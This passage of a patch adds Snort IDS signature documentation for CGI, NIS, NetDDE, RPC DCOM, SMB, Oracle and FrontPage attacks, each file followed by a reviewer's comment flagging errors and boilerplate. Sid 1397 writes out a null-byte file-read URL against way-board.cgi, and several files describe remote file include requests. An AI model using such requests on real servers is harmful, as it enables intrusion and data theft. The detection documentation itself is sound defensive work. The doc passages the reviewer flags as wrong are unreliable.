+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
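Review bot: The Summary ("a known vulnerability in a CGI web application") and Affected Systems ("All systems running CGI applications") never name the CGI script or request pattern that SID 873 matches, so the alert cannot be mapped to a product or a patch from this document; the Detailed Information and Attack Scenarios paragraphs are the same generic text reused across several files in this patch. State what the rule looks for. Typos: "ona" for "on a", "attackers choosing" for "attacker's choosing", and the line beginning "relationships between the victim server" runs well past the wrap width used in the rest of the file.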
--- /dev/null
+++ b/doc/signatures/2027.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2027
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
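Review bot: the daemon and client are misnamed throughout. The NIS password-change client is `yppasswd` and the server-side daemon is `rpc.yppasswdd`; the doc writes `ypasswd` and `rpc.ypasswd` in Summary, Detailed Information, Attack Scenarios and Corrective Action, so a reader grepping a process list or the cited references for `rpc.ypasswd` finds nothing. Also "Apply pacthes" in Corrective Action. The compromise indicators in Detailed Information (two inetd instances, a root shell on port 77) are artefacts of one known exploit; label them as such so responders do not clear a host merely because those two signs are absent.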
--- /dev/null
+++ b/doc/signatures/3047.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3047
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
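Review bot: the doc never says which host is the victim. Detailed Information places the flaw in Ethereal's ACL parsing, so the affected system is the machine running Ethereal that decodes the captured traffic (an analyst workstation or a sensor), not the host the packet is addressed to; say so in Impact and Affected Systems, because the response differs (restart and upgrade the sniffer, not the server in the packet header). Additional References is empty for a version-specific bug ("Ethereal 0.10.7 and prior"); add the vendor advisory so the reader can confirm which release "Upgrade to the latest non-affected version" means.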
--- /dev/null
+++ b/doc/signatures/1872.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1872
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
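Review bot: the Rule field at the top of the file is empty and nothing in Summary or Detailed Information identifies what this sid matches; "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" would fit any web rule. Fill in the rule line (as 2463.txt in this patch does) or at least the request path or content the signature keys on; without it a responder cannot judge the alert, and the "None known" under False Positives is unverifiable.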
--- /dev/null
+++ b/doc/signatures/2971.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2971
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
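Review bot: this text is identical to 2963.txt in the same patch, so nothing tells the reader what differs between sid 2971 and sid 2963; add the Rule line or one sentence on the NetDDE message element each one matches. In Detailed Information the remark that the issue "can also be exploited locally" is not something a network rule can observe; either drop it or state that this event only covers the network vector. Affected Systems should also reflect that the service "is not started by default", i.e. only hosts where NetDDE has been enabled are reachable this way.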
--- /dev/null
+++ b/doc/signatures/1684.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1684
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
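Review bot: the sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit" (Detailed Information) does not belong here: the event is about commands sent to an Oracle database, which the surrounding text ties to $ORACLE_PORTS, not to telnet; it reads as copied from another rule doc and should go. Attack Scenarios ("Simple. These are Oracle database commands.") answers Ease of Attack instead of describing a scenario; say which command the sid matches and how an attacker reaches the listener. The $ORACLE_PORTS/"any" advice is given twice (Detailed Information and False Negatives); keep it once, under False Negatives, where the port-negotiation explanation already is.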
--- /dev/null
+++ b/doc/signatures/3263.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3263
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
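Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not line up with Detailed Information, which describes a malformed DCOM request over RPC overflowing a buffer; reconcile them by naming the RPC interface and the field the oversized value lands in, since that is what the rule has to match. "Expoit code exists" in Ease of Attack. Additional References is empty even though Impact and the port-blocking advice (135, 139 and 445, TCP and UDP) point at a specific Microsoft bulletin; add it.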
--- /dev/null
+++ b/doc/signatures/1397.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+1397
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the CGI program way-board.cgi.
+
+--
+Impact:
+Information disclosure. An attacker could have viewed sensitive
+documents and system files.  This could be a precursor to a future attack.
+
+--
+Detailed Information:
+Way-board is a Korean webboard web application.  It contains a
+vulnerability that can allow an attacker to view the contents of any
+file on the system.
+
+--
+Affected Systems:
+	Way Way-Board 2.0
+
+--
+Attack Scenarios:
+Attacker sends a simple URL like the following:
+http://www.victim.com/way-board/way-board.cgi?db=url_to_any_file%00
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
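Review bot: the Attack Scenarios URL ends in `%00` but the doc never explains it. That encoded null byte is the working part of the request: it terminates the filename as seen by the underlying file-open call, so any suffix the script appends after the `db` value is dropped and an arbitrary file is read. Say so in Detailed Information, because the null byte is also what the signature should key on so that ordinary `db=` requests are not matched. Minor: "Original document author unkown" in Contributors.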
--- /dev/null
+++ b/doc/signatures/956.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+956
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
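Review bot: the Rule field is blank and Detailed Information says only that "Many known vulnerabilities exist for this platform", so the reader cannot tell which FrontPage request this sid matches; 960.txt and 963.txt in this patch each name the file they key on (service.stp, svcacl.cnf) and this one should do the same. Add a Microsoft or FrontPage reference under Additional References as well.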
--- /dev/null
+++ b/doc/signatures/2963.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2963
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
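Review bot: verbatim duplicate of 2971.txt, down to the MS04-031 reference. Two sids with the same description cannot be told apart in an alert feed; put the Rule line in each file and one sentence on what this one matches that 2971 does not. Affected Systems lists Windows 98 and ME alongside NT, 2000, XP and 2003 without saying which of them the bulletin actually rates as vulnerable; check the bulletin and list only confirmed platforms.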
--- /dev/null
+++ b/doc/signatures/100000488.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000488
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ISPConfig" application running on a webserver. 
+Access to the file "app.inc.php" using a remote file being passed as the 
+"go_info[isp][classes_root]" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "go_info[isp][classes_root]" parameter in the 
+"app.inc.php" script used by the "ISPConfig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ISPConfig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
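Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host") and the Attack Scenarios text about supplying credentials to an authentication mechanism are boilerplate that do not describe a remote file include; the scenario for this sid is a request to `app.inc.php` with `go_info[isp][classes_root]` set to a URL on a host the attacker controls, so that the server fetches and executes that file. Rewrite those two sections around that request, fix "running ona web server", and in Corrective Action add that disabling inclusion of remote URLs in the PHP configuration blocks this class of attack independently of application patches. Also the `--` separators after Sid, Affected Systems and Contributors lack the blank line the other docs use.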
--- /dev/null
+++ b/doc/signatures/2902.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2902
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_snapshot_propagation
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
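Review bot: the procedure name is broken across lines ("vulnerability in the procedure alter_snapshot_propagation" / ". This procedure is included in" / "sys.dbms_repcat_sna."); join it into one sentence so grep and copy-paste work. "Oracle Oracle9i" in Affected Systems repeats the vendor name and gives no release or patch level, which matters because Corrective Action only says "Apply the appropriate vendor supplied patch" and Additional References is empty; add the Oracle alert and the first fixed patch set.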
--- /dev/null
+++ b/doc/signatures/3146.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3146
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
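Review bot: Corrective Action contradicts Detailed Information. The text says the flaw is exploited "by sending a malicious response from a server in response to a client request", i.e. the vulnerable code is the Windows SMB client, so "Turn off windows file and print services" (the server side) does not protect the client, and "Use Samba as an alternative" replaces a server, not the Windows client that parses the response. Replace both with client-side advice: apply the patch, and block outbound SMB (TCP 139 and 445) to untrusted networks so clients cannot be made to connect to a hostile server. Attack Scenarios should also say that the attacker first has to induce the client to connect to a server they control.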
--- /dev/null
+++ b/doc/signatures/960.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+960
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+This event is generated when an attempt is made to retrieve the file
+service.stp. This file contains sensitive information concerning the
+location of other sensitive files that contain group and password
+information.
+
+--
+Affected Systems:
+	CERN and NCSA servers using Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Special FrontPage directories and Storage Locations:
+http://www.rtr.com/fpsupport/serk4.0/apndx05.htm
+
+--
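Review bot: Attack Scenarios ("from simple directory traversal to exploitation of buffer overflow conditions") is boilerplate that contradicts the second Detailed Information paragraph, which says the event is a retrieval of service.stp; the scenario is a plain GET for that file and should say so. Affected Systems narrows to "CERN and NCSA servers" while Summary and the first paragraph talk about any web server running the extensions; state which is right, otherwise an IIS-only shop will tune the alert out. Corrective Action should add denying web access to the FrontPage configuration files (the cited "Special FrontPage directories" reference lists where they live), since patching alone does not stop a download of a file the server is willing to serve.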
--- /dev/null
+++ b/doc/signatures/100000419.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000419
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ashwebstudio Ashnews" application running on a webserver. Access to the file "ashnews.php" using a remote file being passed as the "pathtoashnews" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "pathtoashnews" parameter in the "ashnews.php" script used by the "Ashwebstudio Ashnews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ashwebstudio Ashnews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
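Review bot: same boilerplate problem as the other remote file include docs in this patch: the third paragraph of Detailed Information ("validating the credentials of a client host") and the Attack Scenarios text about supplying credentials have nothing to do with a remote include via `pathtoashnews`. Describe the actual request (ashnews.php with pathtoashnews pointing at an attacker-hosted file) and fix "running ona web server". Affected Systems should name the Ashnews versions rather than "All systems running CGI applications using Ashwebstudio Ashnews".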
--- /dev/null
+++ b/doc/signatures/963.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+963
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+This event indicates that an attempt has been made to access the file
+svcacl.cnf which may contain sensitive information about the host and
+applications using the FrontPage extensions.
+
+Svcacl.cnf contains data about permissions and IP address restrictions
+on all of the sub-webs.  This information would be very valuable to a
+hacker and could be used to plan future attacks.
+
+--
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky McAtee <rmcatee@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+--
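Review bot: as with 960.txt, the Attack Scenarios boilerplate about buffer overflows does not match Detailed Information, which describes a read of svcacl.cnf; the scenario is a direct request for that file. Affected Systems says "FrontPage Server Extensions 98" while Summary says any web server running the extensions; reconcile the two. The Microsoft URL under Additional References carries a duplicated `&NoWebContent=1&NoWebContent=1` and a nested `scid=http://...` parameter; replace it with the direct link to the KB article named in the query string.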
--- /dev/null
+++ b/doc/signatures/1491.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
